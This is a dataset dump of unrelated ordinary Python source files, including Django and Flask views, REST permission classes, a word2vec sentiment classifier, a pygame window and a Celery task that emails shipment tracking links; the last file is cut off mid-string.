index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
24,600 | 0379e5b0c26c0a72378db9fdcf4f8855261b0214 | from .resources import SearchResource
def includeme(config):
    """Pyramid include hook: wire up the search module's views."""
    config.include('amnesia.modules.search.views')
|
24,601 | a9d351b1611d7af86e1d035c28017367730e374b | import logging
import factory
from sqlalchemy.exc import InvalidRequestError
from haven.lib.database import db
logging.getLogger('factory').setLevel(logging.ERROR)
class BaseFactory(factory.alchemy.SQLAlchemyModelFactory):
    """Base factory: maps relationship kwargs onto their '<name>_id' columns
    and manages SQLAlchemy session state for the build/create strategies."""

    class Meta:
        abstract = True
        sqlalchemy_session = db.session

    @classmethod
    def _build(cls, model_class, *args, **kwargs):
        """Returns a dictionary of a built object."""
        # Bug fix: iterate over a snapshot — we insert '<rel>_id' keys while
        # looping, and mutating a dict during iteration raises RuntimeError.
        for k in list(kwargs):
            if k in model_class.relationships():
                rel_key = '{}_id'.format(k)
                try:
                    kwargs[rel_key] = str(kwargs[k].id)
                except AttributeError:
                    # Related value has no .id (e.g. not a model); skip it.
                    pass
        obj = super(BaseFactory, cls)._build(model_class, *args, **kwargs)
        obj_dict = obj.to_dict()
        try:
            # Detach so the built (not created) object is never flushed.
            db.session.expunge(obj)
        except InvalidRequestError:
            pass
        return obj_dict

    @classmethod
    def _create(cls, model_class, *args, **kwargs):
        """Overrides create strategy, commits on create."""
        # Same snapshot trick as _build to avoid mutation-during-iteration.
        for k in list(kwargs):
            if k in model_class.relationships():
                rel_key = '{}_id'.format(k)
                # NOTE(review): unlike _build this does not tolerate a missing
                # .id — presumably relations must be persisted before create.
                kwargs[rel_key] = str(kwargs[k].id)
        obj = super(BaseFactory, cls)._create(model_class, *args, **kwargs)
        obj.save(obj)
        return obj
|
24,602 | 898cd6cff6edb6e7e4cefd317fb231fd5a07a8f6 | #!/usr/bin/python
#-*-coding:utf-8-*-
#这段代码目的是创建一个可以改变大小的图形窗口
import pygame
from pygame.locals import *
from sys import exit
pygame.init()

# Location of the background image asset.
background_image_filename = "/home/yg/Pictures/1.jpg"
background = pygame.image.load(background_image_filename).convert()

# Initial window size matches the background image; RESIZABLE lets the user
# drag-resize the window.
windows_size = background.get_size()
screen = pygame.display.set_mode(windows_size, RESIZABLE, 32)

while True:
    # Block until the next event arrives.
    event = pygame.event.wait()
    if event.type == QUIT:
        exit()
    if event.type == VIDEORESIZE:
        # Bug fix: was misspelled 'vindows_size', so the display was
        # re-created with the OLD size on every resize event.
        windows_size = event.size
        screen = pygame.display.set_mode(windows_size, RESIZABLE, 32)
        pygame.display.set_caption("Window resize to " + str(event.size))
    # Tile the background image over the whole (possibly resized) window.
    screen_width, screen_height = windows_size
    for y in range(0, screen_height, background.get_height()):
        for x in range(0, screen_width, background.get_width()):
            screen.blit(background, (x, y))
    pygame.display.update()
|
24,603 | b5ccc92e93e84375aef1443eddc3e8cf59bef31a | from django.db import models
import random
import string
class Timetable(models.Model):
    """An uploaded timetable file, referenced by an external string id."""
    timetable = models.FileField(upload_to='timetables/')
    timetable_id = models.CharField(max_length=50)
    uploaded_at = models.DateTimeField(auto_now_add=True)
    def __str__(self):
        return str(self.timetable_id)
class Year(models.Model):
    """An academic year (stored as a plain integer)."""
    year = models.IntegerField()
    def __str__(self):
        return str(self.year)
class Semester(models.Model):
    """A semester number belonging to one Year."""
    year = models.ForeignKey(Year, on_delete=models.CASCADE, related_name='semesters')
    sem = models.IntegerField()
    def __str__(self):
        return str(self.sem)
class Exam(models.Model):
    """One exam row of a timetable, linked to a Semester.

    NOTE(review): date and time are free-form CharFields — presumably they
    carry whatever text was parsed from the uploaded timetable; confirm
    before relying on chronological ordering.
    """
    semester = models.ForeignKey(Semester, on_delete=models.CASCADE, related_name='exams')
    # Denormalized link back to the source Timetable's string id.
    timetable_id = models.CharField(max_length=50)
    exam_no = models.IntegerField()
    unit_name = models.CharField(max_length=100)
    invigilator = models.CharField(max_length=100)
    venue = models.CharField(max_length=100)
    date = models.CharField(max_length=100)
    time = models.CharField(max_length=100)
    def __str__(self):
        return self.unit_name
|
24,604 | b0dab165670fd909b4813857fcbb6ccb6bbf7a05 | from gensim.models import Word2Vec as w2v
from sklearn import svm
import nltk
import pandas
import numpy as np
from sklearn import svm
import csv
import re
import pickle
class File_Tools():
    """Static helpers for reading/writing TSV and plain-text files."""

    @staticmethod
    def get_tsv_col(file_name : str, *cols) -> dict:
        """Read the named columns from a TSV file.

        Returns {column_name: [cell, ...]} for each requested column.
        Raises ValueError if a requested column is missing from the header.
        """
        with open(file_name) as f:
            rd = csv.reader(f, delimiter="\t", quotechar='"')
            title_row = next(rd)
            rows = {}
            for col in cols:
                if col not in title_row:
                    # Bug fix: the exception was instantiated but never
                    # raised, silently dropping unknown column names.
                    raise ValueError("Invalid column name: {}".format(col))
                rows[title_row.index(col)] = col
            result = {name: [] for name in rows.values()}
            for row in rd:
                for idx, name in rows.items():
                    result[name].append(row[idx])
        return result

    @staticmethod
    def get_all_lines(file_name : str):
        """Return the file's content split on '\\n' (keeps a trailing '')."""
        with open(file_name, "r", encoding="utf-8") as f:
            return f.read().split("\n")

    @staticmethod
    def save_list_to_file(file_name : str, ls : list):
        """Write each phrase on its own line, overwriting the file."""
        with open(file_name, "w+", encoding="utf-8") as f:
            for phrase in ls:
                # Bug fix: writelines() on a str iterates characters; write()
                # is the intended call (same bytes, clearer contract).
                f.write(phrase + "\n")
class Text_Preprocessing():
    """Text normalization helpers."""
    @staticmethod
    def clean_phrases(phrases : list):
        """Lowercase/strip each phrase, drop non-alphanumerics, and collapse
        runs of whitespace to a single space."""
        cleaned = []
        for raw in phrases:
            text = re.sub(r'[^a-z0-9\s]', '', raw.lower().strip())
            cleaned.append(re.sub(r'\s{2,}', ' ', text))
        return cleaned
# @staticmethod
# async def clean_phrases(phrases : list):
# res = []
# executor = concurrent.futures.ProcessPoolExecutor(10)
# res = [executor.submit(Text_Preprocessing.__clean_phrases__, phrase_group) for phrase_group in grouper(10000, phrases)]
# concurrent.futures.wait(res)
# return res
# @staticmethod
# def tokenize(phrase):
# return [token for token in phrase.split() if token not in STOP_WORDS]
class Word_To_Vec_Tools(object):
    """Thin wrapper around gensim Word2Vec: corpus prep, training, queries."""

    def __init__(self) -> None:
        super().__init__()

    def make_corpus(self, input_file : str, col_name : str):
        """Tokenize sentences from a CSV column, or from raw lines when
        col_name is falsy."""
        if not col_name:
            self.__make_corpus__(input_file)
            return
        # Bug fix: the local was named 'csv', shadowing the csv module.
        csv_data = pandas.read_csv(input_file)
        df = pandas.DataFrame(csv_data)
        sentences = df[col_name].values
        self.word_vec = [nltk.word_tokenize(sentence) for sentence in sentences]

    def __make_corpus__(self, input_file : str):
        """Tokenize one sentence per line of a plain-text file."""
        sentences = File_Tools.get_all_lines(input_file)
        self.word_vec = [nltk.word_tokenize(sentence) for sentence in sentences]

    def load_model(self, model_name : str):
        """Load a previously saved Word2Vec model from disk."""
        self.model = w2v.load(model_name)

    def save_model(self, model_name : str):
        """Persist the current model; raises RuntimeError if none exists."""
        if getattr(self, 'model', None) is None:
            # Bug fix: the exception was created but never raised.
            raise RuntimeError("No model to save")
        self.model.save(model_name)

    def train_model(self, sg = 1, size = 300, window = 10, min_count = 2, workers = 4) -> None:
        """Train Word2Vec on the corpus prepared by make_corpus."""
        if getattr(self, 'word_vec', None) is None:
            # Bug fix: the exception was created but never raised.
            raise RuntimeError("Must make word vec")
        self.model = w2v(self.word_vec, vector_size=size, window=window, epochs=10, sg=sg, min_count=min_count, workers=workers)

    def get_similar_words(self, word : str, num_words = 10) -> list:
        """Return the num_words words most similar to *word*."""
        if getattr(self, 'model', None) is None:
            raise RuntimeError("Must create model first")
        # Bug fix: was self.model.most_simlar(word, size=...) — misspelled
        # method and wrong keyword; gensim exposes wv.most_similar(topn=).
        return self.model.wv.most_similar(word, topn=num_words)

    def get_average_of_sentence(self, phrase) -> list:
        """Collect the model vectors for each in-vocabulary token of *phrase*.

        NOTE(review): despite the name this returns the LIST of vectors, not
        their average, and returns -1 for an empty phrase — callers rely on
        that (see get_average_of_sentences).
        """
        words = nltk.word_tokenize(phrase)
        total = []
        if len(words) == 0:
            print(phrase)
            return -1
        for word in words:
            if word in self.model.wv:
                total.append(self.model.wv[word])
        return total

    def get_average_of_sentences(self, phrases) -> list:
        """Vectorize each phrase, silently skipping non-list results."""
        res = []
        for phrase in phrases:
            tmp = self.get_average_of_sentence(phrase)
            if isinstance(tmp, list):
                res.append(tmp)
        return res

    def get_similar(self, positive : list, negative : list):
        """Analogy query: most_similar with positive/negative word lists."""
        if getattr(self, 'model', None) is None:
            raise RuntimeError("Must create model first")
        return self.model.wv.most_similar(positive = positive, negative = negative)
class Classifier():
    """Wraps an sklearn SVM: training, persistence, and evaluation."""

    def __init__(self) -> None:
        pass

    def train_svm_classifier(self, phrases, categories) -> None:
        """Fit a degree-6 polynomial-kernel SVC on labelled phrase vectors."""
        self.classifier = svm.SVC(kernel="poly", degree=6)
        self.classifier.fit(phrases, categories)

    def save_classifier(self, classifier_name) -> None:
        """Pickle the trained classifier to disk."""
        with open(classifier_name, 'wb') as out:
            pickle.dump(self.classifier, out, protocol=pickle.HIGHEST_PROTOCOL)

    def load_classifier(self, file_name) -> None:
        """Restore a pickled classifier from disk."""
        with open(file_name, 'rb') as src:
            self.classifier = pickle.load(src)

    def test_single_phrase_vector(self, phrase_vec):
        """Predict the category of a single phrase vector."""
        return self.classifier.predict([phrase_vec])

    def test_many_phrase_vectors(self, phrase_vecs):
        """Predict categories for a batch of phrase vectors."""
        return self.classifier.predict(phrase_vecs)

    def test_results(self, phrase_vecs, res):
        """Mean accuracy of the classifier on labelled vectors."""
        return self.classifier.score(phrase_vecs, res)
# def check_category(self, categories : list, phrase : str):
# sentence_score = self.get_average_of_sentence(phrase)
# max_similarity = 0
# res = None
# for category in categories:
# cos_similarity = np.dot(sentence_score, self.model.wv[category])/(np.linalg.norm(sentence_score) * np.linalg.norm(self.model.wv[category]))
# if cos_similarity > max_similarity:
# max_similarity = cos_similarity
# res = category
# return res
def main():
    """Score test.tsv phrases with the saved SVM and write Results.csv."""
    # --- one-off training pipeline, kept commented for reference ---
    # w2vt = Word_To_Vec_Tools()
    # t = File_Tools.get_tsv_col("train.tsv", "Phrase")
    # File_Tools.save_list_to_file("Movie_Phrases.txt", t["Phrase"])
    # w2vt.make_corpus("Movie_Phrases.txt", None)
    # w2vt.train_model()
    # w2vt.save_model("movie_model.model")
    # sent = File_Tools.get_tsv_col("train.tsv", "Sentiment", "Phrase")
    # sent_avg = w2vt.get_average_of_sentences(sent["Phrase"])
    # k_v_pairs = []
    # for i in range(len(sent_avg)):
    #     try:
    #         k_v_pairs.append((sent_avg[i][0], sent["Sentiment"][i]))
    #     except:
    #         pass
    # c = Classifier()
    # c.train_svm_classifier([i[0] for i in k_v_pairs], [j[1] for j in k_v_pairs])
    # c.save_classifier('svm_model.pickle')
    test_info = File_Tools.get_tsv_col("test.tsv", "Phrase", "PhraseId")
    w2vt = Word_To_Vec_Tools()
    w2vt.load_model("movie_model.model")
    sent_avg = w2vt.get_average_of_sentences(test_info["Phrase"])
    res = {}
    c = Classifier()
    c.load_classifier("svm_model.pickle")
    # Cleanup: a redundant manual counter (i = 0 / i += 1) shadowed the
    # enumerate index and an unused list 'ls' was allocated; removed.
    for i, p in enumerate(sent_avg):
        try:
            res[test_info["PhraseId"][i]] = c.test_single_phrase_vector(p[0])[0]
        except Exception:
            # Unscorable phrase (e.g. empty vector list): default to class 0.
            res[test_info["PhraseId"][i]] = 0
        # Progress log every 1000 phrases.
        if (i + 1) % 1000 == 0:
            print(i + 1)
    with open("Results.csv", "w", newline='') as f:
        w = csv.writer(f)
        w.writerow(["PhraseId", "Sentiment"])
        for k, v in res.items():
            w.writerow([k, v])

if __name__ == '__main__':
    main()
|
24,605 | d3be652f3570b2f362af211e12614ce161f02032 | __author__ = 'TOANTV'
from rest_framework.permissions import BasePermission
SAFE_METHODS = ('GET', 'HEAD', 'OPTIONS')
class IsOneUserAuthenticated(BasePermission):
    """Allow access only to authenticated users.

    NOTE: this module calls is_authenticated() as a method throughout,
    i.e. it targets legacy Django where it was not yet a property.
    """
    def has_permission(self, request, view):
        return request.user and request.user.is_authenticated()
class IsOneSuperAdmin(BasePermission):
    """Allow access only to superusers."""
    def has_permission(self, request, view):
        return request.user and request.user.is_superuser
class IsOneUserAdmin(BasePermission):
    """Allow access for moderators (is_smod == 1) and superusers."""
    def has_permission(self, request, view):
        user = request.user
        if not (user and user.is_authenticated()):
            return False
        return user.is_smod == 1 or user.is_superuser
class IsOneUserScanner(BasePermission):
    """Allow access for scanner users (is_smod == 2) and superusers."""
    def has_permission(self, request, view):
        user = request.user
        if not (user and user.is_authenticated()):
            return False
        return user.is_smod == 2 or user.is_superuser
# class IsOneSuperAdminOrIsSelf(BasePermission):
# def has_object_permission(self, request, view, obj):
# return obj == request.user or request.user.is_superuser
class IsOneUserAuthenticatedReadOnlyOrScanner(BasePermission):
    """Reads for any authenticated user; writes for moderators/scanners
    (is_smod >= 1) and superusers."""
    def has_permission(self, request, view):
        user = request.user
        if request.method in SAFE_METHODS:
            return user and user.is_authenticated()
        if user and user.is_authenticated():
            return user.is_smod >= 1 or user.is_superuser
        return False
class IsOneUserAuthenticatedReadOnly(BasePermission):
    """Allow only safe (read-only) methods, and only when authenticated."""
    def has_permission(self, request, view):
        if request.method not in SAFE_METHODS:
            return False
        return request.user and request.user.is_authenticated()
class AllowAnyReadOnly(BasePermission):
    """Safe methods for everyone; writes only for authenticated users."""
    def has_permission(self, request, view):
        # Bug fix: is_authenticated was referenced without calling it. On the
        # legacy Django this module targets (every sibling class calls it as
        # a method), the bound method object is always truthy, so ANY user —
        # including anonymous — was granted write access.
        return (
            request.method in SAFE_METHODS or
            request.user and
            request.user.is_authenticated()
        )
class IsOneUserReadOnlyOrSuperAdmin(BasePermission):
    """Reads for any authenticated user; writes for superusers only."""
    def has_permission(self, request, view):
        if request.method in SAFE_METHODS:
            return request.user and request.user.is_authenticated()
        else:
            return request.user and request.user.is_superuser
class IsOneUserReadOnlyOrScanner(BasePermission):
    """Reads for any authenticated user; writes for scanners (is_smod == 2)
    and superusers."""
    def has_permission(self, request, view):
        if request.method in SAFE_METHODS:
            return request.user and request.user.is_authenticated()
        # Bug fix: the write branch read request.user.is_smod without an
        # authentication guard; an anonymous user has no is_smod attribute,
        # so unsafe requests crashed (HTTP 500) instead of being denied.
        # Guard mirrors IsOneUserScanner above.
        if request.user and request.user.is_authenticated():
            return request.user.is_smod == 2 or request.user.is_superuser
        return False
class IsOneUserAuthenticatedReadOnlyOrAdmin(BasePermission):
    """Reads for any authenticated user; writes for moderators (is_smod == 1)
    and superusers."""
    def has_permission(self, request, view):
        if request.method in SAFE_METHODS:
            return request.user and request.user.is_authenticated()
        # Bug fix: same missing auth guard as IsOneUserReadOnlyOrScanner —
        # anonymous unsafe requests raised AttributeError on is_smod.
        if request.user and request.user.is_authenticated():
            return request.user.is_smod == 1 or request.user.is_superuser
        return False
class IsAnyOneReadOnly(BasePermission):
    """Allow only safe (read-only) methods, for anyone."""
    def has_permission(self, request, view):
        return request.method in SAFE_METHODS
24,606 | ff3932d34fda83fd381d52bb368c4c2a8c8c91ca | #!/usr/bin/python
# -*- coding: <encoding name> -*-
from pymongo import MongoClient
def Connection(host='127.0.0.1', port=27017, database=None):
    """Return a pymongo Database handle for *database* on the given server.

    Security/bug fix: the database was previously selected with
    eval('conn.' + database), which executes arbitrary code if the name is
    attacker-controlled and breaks for names that are not valid Python
    identifiers. Dictionary-style access is the supported pymongo API.
    """
    conn = MongoClient(host=host, port=port)
    return conn[database]
if __name__ == "__main__":
    # Smoke test against a hard-coded dev server.
    db = Connection(host='192.168.3.100', database='xxx')
    print(db.test.insert_one({'a': 1}))
    # Bug fix: find_one was not called, so the bound method object was
    # printed instead of the inserted document.
    print(db.test.find_one())
24,607 | 75d947afef7bfde1777f19d67311c7b958ab89aa | from django.shortcuts import render,redirect
from django.template import RequestContext
from django.contrib.auth import authenticate,login,get_user_model
from .forms import PolicyForm,InsuranceForm
# Create your views here.
def insurance(request):
    """Render the insurance form; on a valid POST, save it and jump back
    to the policy section of the landing page."""
    form = InsuranceForm(request.POST or None)
    context = {"insurance_form": form}
    if form.is_valid():
        print(form.cleaned_data)
        context['insurance_form'] = InsuranceForm()
        form.save()
        return redirect("/#policy")
    return render(request, 'insurance/insurance.html', context)
def policy(request):
    """Render the policy registration form; on a valid POST redirect to
    the insurance view.

    NOTE(review): unlike insurance(), the validated form is never saved —
    confirm whether that is intentional.
    """
    form = PolicyForm(request.POST or None)
    context = {"policy_form": form}
    print("hai")
    if form.is_valid():
        print("hai1")
        print(form.cleaned_data)
        context['policy_form'] = PolicyForm()
        return redirect("insurance")
    return render(request, 'policy/policy_register.html', context)
24,608 | 5206c2bc21c9b9ca98d1bf9140386a5babc88e42 | # in order for this to run, you need to
# * install python and include python and python/Scripts folder in windows environment variable PATH
# * install flask package with pip install flask
# * run the command python server.py
import random
from flask import Flask, render_template
from flask import request, jsonify
from bson.json_util import dumps
from urllib.parse import parse_qs
from pymongo import MongoClient
import time
import sqlite3
import pandas
from sqlalchemy import create_engine
# import json
# import ast
# import imp
# from config import client
# from app import app
# this example is based on
# https://codeburst.io/creating-a-full-stack-web-application-with-python-npm-webpack-and-react-8925800503d9
app = Flask(__name__, static_folder='../client/dist', template_folder='../client/src/templates')
@app.route('/')
def index():
    """Serve the client's index.html template."""
    return render_template('index.html')
@app.route('/hello')
def hello():
    """Return a random greeting string."""
    return get_hello()
@app.route("/data", methods=['GET'])
def data():
    """Expose the MongoDB-backed dataset."""
    return get_data_from_mongodb()
@app.route("/dataSqLite", methods=['GET'])
def data_sqlite():
    """Expose the SQLite-backed dataset."""
    return get_data_from_sqlite()
@app.route("/dataMySql", methods=['GET'])
def data_mysql():
    """Expose the MySQL-backed dataset."""
    return get_data_from_mysql()
def get_hello():
    """Pick one greeting at random from a small multilingual list."""
    greetings = ['Ciao', 'Hei', 'Salut', 'Hola', 'Hallo', 'Hej']
    return random.choice(greetings)
def get_data_from_mongodb():
    """Return rows of MongoDB collection visualization.german_data as JSON.

    With query-string params: use them as an exact-match filter (numeric
    strings coerced to int); 404 when nothing matches. Without params:
    return the first 10000 documents, logging query/conversion timings.
    Any error yields an empty 500 response.
    """
    # this example is based on
    # https://www.moesif.com/blog/technical/restful/Guide-to-Creating-RESTful-APIs-using-Python-Flask-and-MongoDB/
    # DATABASE = MongoClient()['restfulapi'] # DB_NAME
    mongo_client = MongoClient('localhost', 27017)
    database = mongo_client.visualization;
    collection = database.german_data;
    try:
        # Call the function to get the query params
        query_params = parse_query_params(request.query_string)
        # Check if dictionary is not empty
        if query_params:
            # Try to convert the value to int
            query = {k: int(v) if isinstance(v, str) and v.isdigit() else v for k, v in query_params.items()}
            # Fetch all the record(s)
            records_fetched = collection.find(query)
            # Check if the records are found
            # NOTE(review): Cursor.count() was removed in PyMongo 4 —
            # presumably this targets PyMongo 3.x; confirm the pinned version.
            if records_fetched.count() > 0:
                # Prepare the response
                return dumps(records_fetched)
            else:
                # No records are found
                return "", 404
        # If dictionary is empty
        else:
            current_milli_time = lambda: int(round(time.time() * 1000))
            start_time = current_milli_time()
            limit = 10000
            document_cursor = collection.find().limit(limit)
            time_after_query = current_milli_time()
            print('Time for query: ' + str(time_after_query - start_time) + ' ms')
            # Return all the records as query string parameters are not available
            count = document_cursor.count()
            print('Number of records: ' + str(count))
            if count > 0:
                documents = jsonify(list(document_cursor))
                time_after_conversion = current_milli_time()
                print('Time for conversion: ' + str(time_after_conversion - time_after_query) + ' ms')
                return documents
            else:
                return jsonify([])
    except Exception as exception:
        print(exception)
        return "", 500
def get_data_from_sqlite():
    """Return every row of table german_data from ./german_data.sqlite as
    JSON records, logging query/conversion timings; empty 500 on error."""
    try:
        # Call the function to get the query params
        query_params = parse_query_params(request.query_string)
        # Check if dictionary is not empty
        if query_params:
            #todo
            # NOTE(review): filtering is unimplemented; this branch falls
            # through and the function returns None, which Flask turns
            # into an error response.
            foo=1
        else:
            # Return all the records as query string parameters are not available
            current_milli_time = lambda: int(round(time.time() * 1000))
            start_time = current_milli_time()
            with sqlite3.connect('./german_data.sqlite') as connection:
                query = "SELECT * FROM `german_data`"
                data_frame = pandas.read_sql_query(query, connection)
            time_after_query = current_milli_time()
            print('Time for query: ' + str(time_after_query - start_time) + ' ms')
            count = data_frame.shape[0]
            print('Number of records: ' + str(count))
            if count > 0:
                documents = data_frame.to_json(orient='records')
                time_after_conversion = current_milli_time()
                print('Time for conversion: ' + str(time_after_conversion - time_after_query) + ' ms')
                return documents
            else:
                # Return empty array if no users are found
                return jsonify([])
    except Exception as exception:
        print(exception);
        # Error while trying to fetch the resource
        # Add message for debugging purpose
        return "", 500
def get_data_from_mysql():
    """Return up to 100000 rows of table german_data from MySQL as JSON
    records, logging query/conversion timings; empty 500 on error."""
    try:
        # Call the function to get the query params
        query_params = parse_query_params(request.query_string)
        # Check if dictionary is not empty
        if query_params:
            #todo
            # NOTE(review): filtering unimplemented — falls through and
            # returns None (error response), same as the SQLite variant.
            foo=1
        else:
            # Return all the records as query string parameters are not available
            # NOTE(review): connection settings (and a password placeholder)
            # are hard-coded in source; move them to config/env.
            host = 'dagobah'
            port = 3366
            database = 'visualization'
            username = 'root'
            password = '*******' #you need to use right password for this to work
            engine = create_engine(f"mysql://{username}:{password}@{host}:{port}/{database}")
            current_milli_time = lambda: int(round(time.time() * 1000))
            start_time = current_milli_time()
            with engine.connect() as connection:
                query = "SELECT * FROM `german_data`" + " LIMIT 100000"
                data_frame = pandas.read_sql_query(query, connection)
            time_after_query = current_milli_time()
            print('Time for query: ' + str(time_after_query - start_time) + ' ms')
            count = data_frame.shape[0]
            print('Number of records: ' + str(count))
            if count > 0:
                documents = data_frame.to_json(orient='records')
                time_after_conversion = current_milli_time()
                print('Time for conversion: ' + str(time_after_conversion - time_after_query) + ' ms')
                return documents
            else:
                # Return empty array if no users are found
                return jsonify([])
    except Exception as exception:
        print(exception);
        # Error while trying to fetch the resource
        # Add message for debugging purpose
        return "", 500
def parse_query_params(query_string):
    """Decode a raw query string (bytes) into a flat {key: first_value} dict."""
    parsed = parse_qs(query_string.decode())
    return {key: values[0] for key, values in parsed.items()}
# Start the Flask development server when run directly.
if __name__ == '__main__':
    app.run()
|
24,609 | d9d125a3f9e835543f13e8b91d29bee024fe24d2 | s=0
# Sum and count the odd multiples of 3 between 1 and 500.
impares = [c for c in range(0, 501, 3) if c % 2 == 1]
s = sum(impares)
cont = len(impares)
print('a soma dos numeros impares e multiplos de 3 entre 1 e 500 e {}'.format(s))
print('foram contados {} numeros'.format(cont))
24,610 | 82a0675d518a666aec36e8a5d18727fa68b2a2e4 | import pygame
from network import Network
from player import Player
# Fixed client window dimensions.
width = 500
height = 500
# NOTE(review): the display is created at import time and pygame.init() is
# never called — presumably set_mode suffices here, but confirm no other
# pygame subsystems (fonts, mixer) are needed.
win = pygame.display.set_mode((width, height))
pygame.display.set_caption("Client")
def redraw_window(win, player, player2):
    """Clear the frame, draw both players, and flip the display."""
    win.fill('white')
    for sprite in (player, player2):
        sprite.draw(win)
    pygame.display.update()
def main():
    """Client loop: sync our player with the server and render at 60 FPS."""
    run = True
    n = Network()
    player = n.get_p()
    clock = pygame.time.Clock()
    while run:
        clock.tick(60)
        # Send our state; the server replies with the other player's state.
        player2 = n.send(player)
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                run = False
                # Bug fix: pygame.QUIT is an event-type constant (an int) and
                # is not callable; pygame.quit() is the shutdown function.
                pygame.quit()
        player.move()
        redraw_window(win, player, player2)

main()
24,611 | 6030d77ac0e6a6b4efd05e73f1321d7c001c912d | # @class_declaration interna #
# import datetime
from celery.task import periodic_task
from celery.schedules import crontab
from YBUTILS import notifications
from YBLEGACY import qsatype
from YBLEGACY.constantes import *
from models.flsyncppal import flsyncppal_def as syncppal
class interna(qsatype.objetoBase):
    """Base of the legacy class chain; stores the form context."""
    # Shared default context object (class attribute, overwritten per instance).
    ctx = qsatype.Object()
    def __init__(self, context=None):
        self.ctx = context
# @class_declaration sanhigia_sync #
class sanhigia_sync(interna):
    """Periodic task layer: emails customers their shipment tracking links.

    Every 30 minutes, picks up to 20 delivery notes with a tracking number
    still in 'Pendiente' state, builds an HTML tracking email, sends it via
    the SMTP settings stored in factppal_general, and records the resulting
    state ('Enviado', 'Error' or 'Sin correo') on the delivery note.
    """
    # NOTE(review): the function deliberately takes no 'self' — it is wrapped
    # by celery's periodic_task decorator at class-definition time; confirm it
    # is never invoked through an instance.
    @periodic_task(run_every=crontab(minute="*/30", hour="*"))
    def sanhigia_sync_enviocorreo():
        # Pending delivery notes that already have a tracking number.
        q = qsatype.FLSqlQuery()
        q.setSelect("a.idalbaran,a.agenciaenvio,a.sh_numtracking,a.codigo,c.nombre,c.email")
        q.setFrom("albaranescli a LEFT OUTER JOIN clientes c ON a.codcliente = c.codcliente")
        where = "a.sh_numtracking is not null AND a.sh_estadosegui = 'Pendiente' ORDER BY a.fecha LIMIT 20"
        # if where != "":
        # where += " AND "
        q.setWhere(where)
        q.exec_()
        if not q.size():
            # syncppal.iface.log("Exito", "No hay datos para enviar")
            return True
        # Load outgoing-mail (SMTP) settings from the general config table.
        oDM = qsatype.Object()
        qDM = qsatype.FLSqlQuery()
        qDM.setSelect("sh_hostcorreosaliente, sh_puertosmtp, sh_tipocxsmtp, sh_tipoautsmtp, sh_usuariosmtp, sh_passwordsmtp")
        qDM.setFrom(u"factppal_general")
        qDM.setWhere(u"1 = 1")
        if not qDM.exec_():
            # syncppal.iface.log("Error", "No estan informados los datos del correo saliente.")
            return False
        if qDM.first():
            oDM["hostcorreosaliente"] = qDM.value("sh_hostcorreosaliente")
            oDM["puertosmtp"] = qDM.value("sh_puertosmtp")
            oDM["tipocxsmtp"] = qDM.value("sh_tipocxsmtp")
            oDM["tipoautsmtp"] = qDM.value("sh_tipoautsmtp")
            oDM["usuariosmtp"] = qDM.value("sh_usuariosmtp")
            oDM["passwordsmtp"] = qDM.value("sh_passwordsmtp")
        while q.next():
            idalbaran = q.value("a.idalbaran")
            agencia = q.value("a.agenciaenvio")
            codigo = q.value("a.codigo")
            numtracking = q.value("a.sh_numtracking")
            nombre = q.value("c.nombre")
            # Prefer the email captured on the originating web order, falling
            # back to the customer record's email.
            email = qsatype.FLUtil.quickSqlSelect("albaranescli a INNER JOIN lineasalbaranescli la ON a.idalbaran = la.idalbaran INNER JOIN pedidoscli p ON la.idpedido = p.idpedido", "p.mg_email", "a.idalbaran = {} AND p.mg_increment_id is not null".format(idalbaran))
            if not email or email == "":
                email = q.value("c.email")
            estado = "Pendiente"
            asunto = "Seguimiento del pedido {}".format(codigo)
            cuerpo = ""
            if not email or email == "":
                # syncppal.iface.log("Error. El cliente {} con pedido {} no tiene email.".format(item["nombre"], item["codigo"]), "enviocorreo")
                # NOTE(review): in this branch 'connection' is never assigned,
                # so the 'if connection is False' check below raises NameError
                # on the first iteration without email — confirm and guard.
                estado = "Sin correo"
            else:
                connection = notifications.get_connection(oDM["hostcorreosaliente"], oDM["usuariosmtp"], oDM["passwordsmtp"], oDM["puertosmtp"], oDM["tipocxsmtp"])
                urlsegui = qsatype.FLUtil.quickSqlSelect("agenciastrans", "urlsegui", "codagencia = '{}'".format(agencia))
                if urlsegui is None or urlsegui == "":
                    # Carrier has no tracking-URL template configured; skip.
                    continue
                # Static HTML email skeleton (styles + header), then the
                # per-order body, then the closing tags.
                cuerpo += '<style type="text/css">@import url(http://fonts.googleapis.com/css?family=Raleway:400,500,700);@media screen {.email-heading h1,.store-info h4, th.cell-name,a.product-name,p.product-name,.address-details h6,.method-info h6,h5.closing-text,.action-button,.action-button a,.action-button span, .action-content h1 {font-family: "Raleway", Verdana, Arial !important;font-weight: normal;}}@media screen and (max-width: 600px) {body {width: 94% !important;padding: 0 3% !important;display: block !important;}.container-table {width: 100% !important;max-width: 600px;min-width: 300px;} td.store-info h4 {margin-top: 8px !important;margin-bottom: 0px !important;}td.store-info p {margin: 5px 0 !important;}.wrapper {width: 100% !important; display: block;padding: 5px 0 !important;}.cell-name,.cell-content {padding: 8px !important;}}@media screen and (max-width: 450px) {.email-heading, .store-info {float: left;width: 98% !important;display: block;text-align: center;padding: 10px 1% !important;border-right: 0px !important;} .address-details, .method-info {width: 85%;display: block;}.store-info {border-top: 1px dashed #c3ced4;}.method-info {margin-bottom: 15px !important;}}/* Remove link color on iOS */.no-link a {color: #333333 !important;cursor: default !important;text-decoration: none !important;}.method-info h6,.address-details h6,.closing-text {color: #3696c2 !important;}td.order-details h3,td.store-info h4 {color: #333333 !important;}.method-info p,.method-info dl {margin: 5px 0 !important;font-size: 12px !important;}td.align-center {text-align: center !important;}td.align-right {text-align: right !important;}/* Newsletter styles */td.expander {padding: 0 !important;}table.button td,table.social-button td {width: 92% !important;}table.facebook:hover td {background: #2d4473 !important;}table.twitter:hover td {background: #0087bb !important;}table.google-plus:hover td { background: #CC0000 !important;}@media screen and (max-width: 600px) {.products-grid tr td {width: 50% !important;display: block !important;float: left !important;}}.product-name a:hover {color: #3399cc !important;text-decoration: none !important;}</style><!-- Begin wrapper table --><table width="100%" cellpadding="0" cellspacing="0" border="0" id="background-table" style="mso-table-lspace: 0pt; mso-table-rspace: 0pt; border-collapse: collapse; padding: 0; margin: 0 auto; background-color: #ebebeb; font-size: 12px;"><tr><td valign="top" class="container-td" align="center" style="font-family: Verdana, Arial; font-weight: normal; border-collapse: collapse; vertical-align: top; padding: 0; margin: 0; width: 100%;"><table cellpadding="0" cellspacing="0" border="0" 